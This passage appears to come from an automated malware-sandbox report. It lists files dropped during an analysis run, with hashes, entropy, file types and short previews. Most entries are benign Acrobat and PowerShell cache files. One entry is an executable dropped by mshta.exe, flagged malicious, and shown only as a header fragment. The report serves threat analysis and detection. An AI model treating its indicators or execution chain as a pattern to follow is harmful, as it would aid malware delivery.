                                                                                                                  SHA-512:25A5C8530A988A9A129F07C842DA536F813971D53427CBCBD6B1DFB540D498445F694EA929D90D94681724A0E699588C07BCA370246E78C90270F8BFFAB9587F
                                                                                                                  Malicious:false
                                                                                                                  Preview:{"analyticsData":{"responseGUID":"4011b47a-71f0-46cd-a55e-a5efb8f2aadf","sophiaUUID":"6BC8D74A-F8DC-462C-8ED4-D40FDD780397"},"encodingScheme":true,"expirationDTS":1735112419519,"statusCode":200,"surfaceID":"DC_Reader_Edit_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                  File Type:JSON data
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):295
                                                                                                                  Entropy (8bit):5.291418157334888
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:6:YEQXJ2HXDdt3mobJH2vB3/dVlPIHAR0YQouoAvJfzdPeUkwRe9:YvXKX+obV2vR/ZwHAsoFGb8Ukee9
                                                                                                                  MD5:AD9C10EC62CC6721585F1635145450D9
                                                                                                                  SHA1:161A2095AF0F4A532D3ACDDC15270FC7DFC5F591
                                                                                                                  SHA-256:7C3139423FAAF6B4CD538248AC390D1490C1CEC60D5C0941A529A91AF74A9FE3
                                                                                                                  SHA-512:9A8E23C0B9E920AEF30E40613431D9296E76127CF82BF88AC9A0F0B8ACAF68769650871797D5E6FD7D52A8960D0976EBE47B2EE91DFBCBD8AC653ABC1A41B92C
                                                                                                                  Malicious:false
                                                                                                                  Preview:{"analyticsData":{"responseGUID":"4011b47a-71f0-46cd-a55e-a5efb8f2aadf","sophiaUUID":"6BC8D74A-F8DC-462C-8ED4-D40FDD780397"},"encodingScheme":true,"expirationDTS":1735112419519,"statusCode":200,"surfaceID":"DC_Reader_Home_LHP_Trial_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                  File Type:JSON data
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):289
                                                                                                                  Entropy (8bit):5.272271759881581
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:6:YEQXJ2HXDdt3mobJH2vB3/dVlPIHAR0YQouoAvJfYdPeUkwRe9:YvXKX+obV2vR/ZwHAsoFGg8Ukee9
                                                                                                                  MD5:AC1DB8661D6E6C271DB9FEAAFCE60C44
                                                                                                                  SHA1:A79A10AA935BFB6AA7AF36DE391C238DED99C0BD
                                                                                                                  SHA-256:DA777B6D7B752AC81EF43643CECCBEDECB91DB531DAAB9E760B33C06BCDC052E
                                                                                                                  SHA-512:B041C47C5423B896F7FDEBCBC3D624B08AFC55AA5D5E2CCF34443936CD0C2E1BCE56B59AA8780077FC7E65BB37FD5A8911BDB809DE592EEFFC42EC0982BAB4AA
                                                                                                                  Malicious:false
                                                                                                                  Preview:{"analyticsData":{"responseGUID":"4011b47a-71f0-46cd-a55e-a5efb8f2aadf","sophiaUUID":"6BC8D74A-F8DC-462C-8ED4-D40FDD780397"},"encodingScheme":true,"expirationDTS":1735112419519,"statusCode":200,"surfaceID":"DC_Reader_More_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                  File Type:JSON data
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):284
                                                                                                                  Entropy (8bit):5.258132950390575
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:6:YEQXJ2HXDdt3mobJH2vB3/dVlPIHAR0YQouoAvJf+dPeUkwRe9:YvXKX+obV2vR/ZwHAsoFG28Ukee9
                                                                                                                  MD5:079D58AA24F43A9D585B2D9F1A00147A
                                                                                                                  SHA1:B9C76DD629238F6DE2826455FF8F392E77F08411
                                                                                                                  SHA-256:BB9371D6C6943977C1908A372B483600E7C207091E26668195106DBAC7C1C193
                                                                                                                  SHA-512:BC478F068D4CBAE267ED8750C64E9AD4BBC3EA195BE4F4DF54790BEE9ED7C0A372A7DA445AA9A5E6E80436C9CB8A471372C92360AF392A2D136C49BC99B0A976
                                                                                                                  Malicious:false
                                                                                                                  Preview:{"analyticsData":{"responseGUID":"4011b47a-71f0-46cd-a55e-a5efb8f2aadf","sophiaUUID":"6BC8D74A-F8DC-462C-8ED4-D40FDD780397"},"encodingScheme":true,"expirationDTS":1735112419519,"statusCode":200,"surfaceID":"DC_Reader_RHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                  File Type:JSON data
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):291
                                                                                                                  Entropy (8bit):5.256009429652479
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:6:YEQXJ2HXDdt3mobJH2vB3/dVlPIHAR0YQouoAvJfbPtdPeUkwRe9:YvXKX+obV2vR/ZwHAsoFGDV8Ukee9
                                                                                                                  MD5:223737DE51A8E0222D2767CA469D7D63
                                                                                                                  SHA1:711850066D1138AF1097425EAB929AD5F7B9020A
                                                                                                                  SHA-256:EB32BDD5B229BD986371FFB828545F5EF957B8B0FA6DE2D542601A892B02F43E
                                                                                                                  SHA-512:3A3F3323F84AF2B9B652B144818C3017663DA2B9E7E3A1FE34B3258D31BE3F69A5E57229A4F97214D87668461ADE6D160133B0EE2F1ED068EBA7C0E1A9495CE2
                                                                                                                  Malicious:false
                                                                                                                  Preview:{"analyticsData":{"responseGUID":"4011b47a-71f0-46cd-a55e-a5efb8f2aadf","sophiaUUID":"6BC8D74A-F8DC-462C-8ED4-D40FDD780397"},"encodingScheme":true,"expirationDTS":1735112419519,"statusCode":200,"surfaceID":"DC_Reader_RHP_Intent_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                  File Type:JSON data
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):287
                                                                                                                  Entropy (8bit):5.2555085467296125
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:6:YEQXJ2HXDdt3mobJH2vB3/dVlPIHAR0YQouoAvJf21rPeUkwRe9:YvXKX+obV2vR/ZwHAsoFG+16Ukee9
                                                                                                                  MD5:B6837DF65B6C15B402A32C609058B21C
                                                                                                                  SHA1:BB42B4C24AFA400F2C2C49CDDF2661E960D88F68
                                                                                                                  SHA-256:DC309A1B87FE83439445561BD447D87BED5C73B614A45BD530A458B6CF87B915
                                                                                                                  SHA-512:C5D2C58E142D034B13B7A41F2B631EE4B124C74FE8BBE29B5997AC6081D5A14AE4EF1DE918B787ACDF87515A27B52FADF94E40FD33FF866D6D922A5EE91B8BE0
                                                                                                                  Malicious:false
                                                                                                                  Preview:{"analyticsData":{"responseGUID":"4011b47a-71f0-46cd-a55e-a5efb8f2aadf","sophiaUUID":"6BC8D74A-F8DC-462C-8ED4-D40FDD780397"},"encodingScheme":true,"expirationDTS":1735112419519,"statusCode":200,"surfaceID":"DC_Reader_RHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                  File Type:JSON data
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):1090
                                                                                                                  Entropy (8bit):5.663785571168922
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:24:Yv6X+obV2Jh+amXayLgE+cNDxeNaqnAvz7xHn0RCmK8czOC/BS4:YvgbYJhABgkDMUJUAh8cvM4
                                                                                                                  MD5:A69A16C0D4D8DA8DE509112C8FBFDCE3
                                                                                                                  SHA1:D59DBC6D60B5CB4B21E29E0BBF66DFE8D08B1F25
                                                                                                                  SHA-256:EA4268C5BC25DC51C462118C3A132140C843F10686A9514990DC3D11D2BB1312
                                                                                                                  SHA-512:772D48A8641D316E8F6338ADB5784D17D85FE1D360805B3510873FEA8A97859703FF4BDCC144C78DFC75B7D76C3EEDFCA7834A06B1D7711F68621668E54FF631
                                                                                                                  Malicious:false
                                                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                  File Type:JSON data
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):286
                                                                                                                  Entropy (8bit):5.229176973479029
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:6:YEQXJ2HXDdt3mobJH2vB3/dVlPIHAR0YQouoAvJfshHHrPeUkwRe9:YvXKX+obV2vR/ZwHAsoFGUUUkee9
                                                                                                                  MD5:1AB774CB3477E791167E2628A154D582
                                                                                                                  SHA1:1466879E78B0A2FE062C062CBE87C1CD6A45ACA6
                                                                                                                  SHA-256:9448496312AA68049C04B1B215E3FCD9CB2C05D4F598522BE7A2746528DE82B8
                                                                                                                  SHA-512:704849713855B86F44192E86F9564520A5D1986CF242F96FB8C7FB0C84E6E9BA1B95CB56AED2D863F6D9F74A7EE80C62DD68F9C93017844E56D93CB2727A5E78
                                                                                                                  Malicious:false
                                                                                                                  Preview:{"analyticsData":{"responseGUID":"4011b47a-71f0-46cd-a55e-a5efb8f2aadf","sophiaUUID":"6BC8D74A-F8DC-462C-8ED4-D40FDD780397"},"encodingScheme":true,"expirationDTS":1735112419519,"statusCode":200,"surfaceID":"DC_Reader_Upsell_Cards","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                  File Type:JSON data
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):282
                                                                                                                  Entropy (8bit):5.252000470554508
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:6:YEQXJ2HXDdt3mobJH2vB3/dVlPIHAR0YQouoAvJTqgFCrPeUkwRe9:YvXKX+obV2vR/ZwHAsoFGTq16Ukee9
                                                                                                                  MD5:4BDA058AE856EFA992600C94225A3847
                                                                                                                  SHA1:DC5036B1F55D402C0F12536B22E562ED6E6399D6
                                                                                                                  SHA-256:700DDC762CAA6998768D1DA98D8E23C694C0B2F222179C45790074E63D86C477
                                                                                                                  SHA-512:A0852987A5A6C3435A6297CCC66C90A72260C561E2E24894BBCF41EE2CF2682442679E6C4D24AC0DEC501F88685AA8B0D12BC05FAC26A2685C97B00FB5345D4A
                                                                                                                  Malicious:false
                                                                                                                  Preview:{"analyticsData":{"responseGUID":"4011b47a-71f0-46cd-a55e-a5efb8f2aadf","sophiaUUID":"6BC8D74A-F8DC-462C-8ED4-D40FDD780397"},"encodingScheme":true,"expirationDTS":1735112419519,"statusCode":200,"surfaceID":"Edit_InApp_Aug2020","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                  File Type:data
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):4
                                                                                                                  Entropy (8bit):0.8112781244591328
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:e:e
                                                                                                                  MD5:DC84B0D741E5BEAE8070013ADDCC8C28
                                                                                                                  SHA1:802F4A6A20CBF157AAF6C4E07E4301578D5936A2
                                                                                                                  SHA-256:81FF65EFC4487853BDB4625559E69AB44F19E0F5EFBD6D5B2AF5E3AB267C8E06
                                                                                                                  SHA-512:65D5F2A173A43ED2089E3934EB48EA02DD9CCE160D539A47D33A616F29554DBD7AF5D62672DA1637E0466333A78AAA023CBD95846A50AC994947DC888AB6AB71
                                                                                                                  Malicious:false
                                                                                                                  Preview:....
                                                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                  File Type:JSON data
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):2814
                                                                                                                  Entropy (8bit):5.133342094278186
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:24:YJLGaKPayl5eBon4OP47b1Mh9j1uv2j0SPVVPA/202LShCAIwK2s0M589kPFuDFj:YI0By4gqwL5VW1LuwK2sri9OY
                                                                                                                  MD5:5DCC4F373920165E7796E9667461656D
                                                                                                                  SHA1:EF0C6B2B88920AAF5EF9057206E0AA0D658A5898
                                                                                                                  SHA-256:BEB7FF36E3F2EDB333915A551745A841A03440833C5908C424EC98B7EC9431F4
                                                                                                                  SHA-512:9C7E52B022B4EACE11DBD2883DFA5995C3268636EF201BE1120157B19F9B18DC2E84DA1D7BE5F58E4CAE5CD379DD77B594B784139F34BE7EF68F4A2240DBDFDB
                                                                                                                  Malicious:false
                                                                                                                  Preview:{"all":[{"id":"DC_Reader_Disc_LHP_Banner","info":{"dg":"8858d1b6a6691979dbd594ca09932123","sid":"DC_Reader_Disc_LHP_Banner"},"mimeType":"file","size":289,"ts":1734934099000},{"id":"DC_Reader_Sign_LHP_Banner","info":{"dg":"e61dd9e36175f642b348bc5427e189e3","sid":"DC_Reader_Sign_LHP_Banner"},"mimeType":"file","size":1090,"ts":1734934098000},{"id":"DC_Reader_Convert_LHP_Banner","info":{"dg":"9671db36ae2d5ccf8574a809548f29c2","sid":"DC_Reader_Convert_LHP_Banner"},"mimeType":"file","size":1123,"ts":1734934098000},{"id":"DC_Reader_Home_LHP_Trial_Banner","info":{"dg":"756e7c4452efc55eb6aef14673cf8c0c","sid":"DC_Reader_Home_LHP_Trial_Banner"},"mimeType":"file","size":295,"ts":1734934098000},{"id":"DC_Reader_Disc_LHP_Retention","info":{"dg":"00c67df63f347560c915dadd5466c366","sid":"DC_Reader_Disc_LHP_Retention"},"mimeType":"file","size":292,"ts":1734934098000},{"id":"DC_Reader_More_LHP_Banner","info":{"dg":"877dc0df75043f99f29a003eeb30dcf3","sid":"DC_Reader_More_LHP_Banner"},"mimeType":"file","
                                                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3040000, file counter 25, database pages 3, cookie 0x2, schema 4, UTF-8, version-valid-for 25
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):12288
                                                                                                                  Entropy (8bit):1.3187579362432291
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:24:TLKufx/XYKQvGJF7urs9Ohn07oz7oF0Hl0FopUEiP66UEiPbnPnNknNMelrtqVpt:TGufl2GL7ms9WR1CPmPbPahlRypilIfB
                                                                                                                  MD5:5BF7829BD2CF308B4099D471F5DBE711
                                                                                                                  SHA1:D595638C70D248E55EEDBDB628EF06E685F0730E
                                                                                                                  SHA-256:F38B209FAAC008A9D5B66D6EBFFE128A0DD5B16F1C48A618A1EB5E03E8BDFC06
                                                                                                                  SHA-512:D8B8FA8926795A34E6A03E8324F5D59A5F874C1CD516CD885919FFF66CC371F545833E163EBF1770E840BDD68F2CE541522700D7510D3376568FBC5244C4B605
                                                                                                                  Malicious:false
                                                                                                                  Preview:SQLite format 3......@ ..........................................................................c.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                  File Type:SQLite Rollback Journal
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):8720
                                                                                                                  Entropy (8bit):1.7808875523135055
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:24:7+t5lhn07oz7oF0Hl0FopUEiP66UEiPbnPnNknNMelr4qVpaVrScVr0InZqLhx/d:7MWWR1CPmPbPahl0ypilIkqFl2GL7msD
                                                                                                                  MD5:D97D26675E1070E36029F414EBBDCD1C
                                                                                                                  SHA1:469FF0DF2145777A23ABC1842047A986F6C1C8F9
                                                                                                                  SHA-256:8AC1014F954C056AB65225416D2596E998973B4A50181BE3604BBEF32AFC9C02
                                                                                                                  SHA-512:7F484BE095E129CE565A87E8C860E18D3F79A5557E04EEDA1055B775653D8666E78581864F31248122ADEF393E184C7E6E0291C12A037C77A2258BCD18F538FC
                                                                                                                  Malicious:false
                                                                                                                  Preview:.... .c........`..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................^..^.^.^.^.^.^.^.p.p.p.p.p.p.p.p.p.p..........................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                  File Type:data
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):66726
                                                                                                                  Entropy (8bit):5.392739213842091
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:768:RNOpblrU6TBH44ADKZEgTQAUQtbXtDisR5BcJloJ7DTNYyu:6a6TZ44ADEcAUQtbJisd7/NK
                                                                                                                  MD5:C5188F090110D8BCBF5F4469DD98CE6B
                                                                                                                  SHA1:94C858884152E3ED692B3BF2A2F267612BD9989F
                                                                                                                  SHA-256:A7BF521608F047E2D76A809AABBAEC3C2F32ECA2ABC7100D9967A807E03F994D
                                                                                                                  SHA-512:1BFA42261624B93CD32AA65D7521237E369569FA5EFD23E6427D980CFACCFCF724BB6FDA5224EF54611BDAEDD4F087245FD3FB591681538ACACA2B92C0257C67
                                                                                                                  Malicious:false
                                                                                                                  Preview:4.397.90.FID.2:o:..........:F:AgencyFB-Reg.P:Agency FB.L:$.........................."F:Agency FB.#.96.FID.2:o:..........:F:AgencyFB-Bold.P:Agency FB Bold.L:%.........................."F:Agency FB.#.84.FID.2:o:..........:F:Algerian.P:Algerian.L:$..........................RF:Algerian.#.95.FID.2:o:..........:F:ArialNarrow.P:Arial Narrow.L:$.........................."F:Arial Narrow.#.109.FID.2:o:..........:F:ArialNarrow-Italic.P:Arial Narrow Italic.L:$.........................."F:Arial Narrow.#.105.FID.2:o:..........:F:ArialNarrow-Bold.P:Arial Narrow Bold.L:%.........................."F:Arial Narrow.#.118.FID.2:o:..........:F:ArialNarrow-BoldItalic.P:Arial Narrow Bold Italic.L:%.........................."F:Arial Narrow.#.77.FID.2:o:..........:F:ArialMT.P:Arial.L:$.........................."F:Arial.#.91.FID.2:o:..........:F:Arial-ItalicMT.P:Arial Italic.L:$.........................."F:Arial.#.87.FID.2:o:..........:F:Arial-BoldMT.P:Arial Bold.L:$.........................."F:Arial.#.100.FID.2
                                                                                                                  Process:C:\Windows\System32\mshta.exe
                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):440983
                                                                                                                  Entropy (8bit):6.371060302148664
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:6144:IhaNDyEJXsEy62haNDyEJXsEy6fhaNDyEJXsEy6XhaNDyEJXsEy64haNDyEJXsEV:Hj186Nj186Oj1862j186Xj186Z
                                                                                                                  MD5:568DA0FF069F69A99BA77F5BFD545E62
                                                                                                                  SHA1:43A07F3A4F6FD731737FE8AB7DCB113D6FFB9778
                                                                                                                  SHA-256:697BB49E47605C59B4994031DDBC1EFB65A2BEB7E7B971F2E3B0B4FB7B27B2F8
                                                                                                                  SHA-512:0A25427CE5471E95F38A71ECDB2CA7519EDAE3401686D8A90244DDDC533639D298D2E5088962EC62DDB28C99D395C4355E1900AED90B78E796794EA3566B580D
                                                                                                                  Malicious:true
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: ReversingLabs, Detection: 39%
                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........(.z.{.z.{.z.{...z.z.{...z.z.{...z.z.{...z.z.{.z.{.{.{...z.z.{...{.z.{...z.z.{Rich.z.{........................PE..L............................T......P.............@..........................p......&.....@...... ..........................P...,....P..(....................`.......1..T...............................................L.......@....................text............................... ..`.data...|...........................@....idata..D).......*..................@..@.didat.......@.......$..............@....rsrc...(....P.......&..............@..@.reloc.......`.......2..............@..B................................................................................................................................................................................................................................................................................
                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:data
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):11608
                                                                                                                  Entropy (8bit):4.890472898059848
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:192:6xoe5qpOZxoe54ib4ZVsm5emdqVFn3eGOVpN6K3bkkjo5OgkjDt4iWN3yBGHVQ9R:9rib4ZmVoGIpN6KQkj2Fkjh4iUxsT6YP
                                                                                                                  MD5:8A4B02D8A977CB929C05D4BC2942C5A9
                                                                                                                  SHA1:F9A6426CAF2E8C64202E86B07F1A461056626BEA
                                                                                                                  SHA-256:624047EB773F90D76C34B708F48EA8F82CB0EC0FCF493CA2FA704FCDA7C4B715
                                                                                                                  SHA-512:38697525814CDED7B27D43A7B37198518E295F992ECB255394364EC02706443FB3298CBBAA57629CCF8DDBD26FD7CAAC44524C4411829147C339DD3901281AC2
                                                                                                                  Malicious:false
                                                                                                                  Preview:PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af
                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:data
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):64
                                                                                                                  Entropy (8bit):0.34726597513537405
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:Nlll:Nll
                                                                                                                  MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                                                                  SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                                                                  SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                                                                  SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                                                                  Malicious:false
                                                                                                                  Preview:@...e...........................................................
                                                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):246
                                                                                                                  Entropy (8bit):3.5178552411299933
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:6:Qgl946caEbiQLxuZUQu+lEbYnuoblv2K8rOlAimlxYle:Qw946cPbiOxDlbYnuRKDlfw
                                                                                                                  MD5:78205219290890F0D40E553DF5E345B4
                                                                                                                  SHA1:EB95BC97122D60C7984627BFE32000F2CAC071AC
                                                                                                                  SHA-256:98F985CCBC74B9AB9C8BCD121126EDAC2CE1B4A16E9F68AEBBBB9C62AF86C521
                                                                                                                  SHA-512:B1BE75E7DDE3B148A478B96C61B336F3AC48472DCFBD360222F3FEAFBFDC2AB3D6AF145FAF4E2B4CF5B73B18C224697C2DC1690FCC64DA63D90BF98B8E5228AE
                                                                                                                  Malicious:false
                                                                                                                  Preview:Error 2711.The specified Feature name ('ARM') not found in Feature table. === Logging stopped: 23/12/2024  01:08:16 ===
                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):60
                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                  Malicious:false
                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):60
                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                  Malicious:false
                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):60
                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                  Malicious:false
                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):60
                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                  Malicious:false
                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):60
                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                  Malicious:false
                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):60
                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                  Malicious:false
                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                  File Type:ASCII text, with very long lines (393)
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):16525
                                                                                                                  Entropy (8bit):5.33860678500249
                                                                                                                  Encrypted:false
